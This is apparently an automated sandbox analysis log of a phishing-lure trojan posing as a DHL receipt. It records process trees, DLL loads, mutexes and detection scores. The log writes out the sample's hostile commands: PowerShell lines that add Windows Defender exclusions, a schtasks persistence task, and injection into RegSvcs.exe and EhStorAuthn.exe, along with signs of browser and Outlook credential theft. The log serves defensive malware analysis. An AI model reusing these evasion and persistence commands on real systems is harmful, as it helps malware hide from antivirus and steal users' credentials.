                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mT0HU9WLYQiSL4lvDj.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.35d0d38.3.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, kQyDFPb4c01tALIVTH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@27/16@13/10
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMutant created: \Sessions\1\BaseNamedObjects\QWEkLOfwOWWajh
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7128:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: DHL AWB Receipt_pdf.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: EhStorAuthn.exe, 00000012.00000003.2675234053.0000000002D72000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000003.2675234053.0000000002DA7000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002D72000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000012.00000002.4686720826.0000000002DA7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: DHL AWB Receipt_pdf.bat.exeReversingLabs: Detection: 50%
                Source: DHL AWB Receipt_pdf.bat.exeVirustotal: Detection: 45%
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile read: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe
                Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmp69A.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeProcess created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: mscoree.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: apphelp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: wldp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: profapi.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: dwrite.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: amsi.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: userenv.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: gpapi.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: textshaping.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: propsys.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: edputil.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: urlmon.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: iertutil.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: srvcli.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: netutils.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: sspicli.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: wintypes.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: appresolver.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: slc.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: sppc.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\ROHkWRpYQqtzDYjutzXtzQNtNDCaVBCJoyzoJhqNSfvaMZfviEJyLs\ctd5Fl0jEEYLVK.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\EhStorAuthn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: DHL AWB Receipt_pdf.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
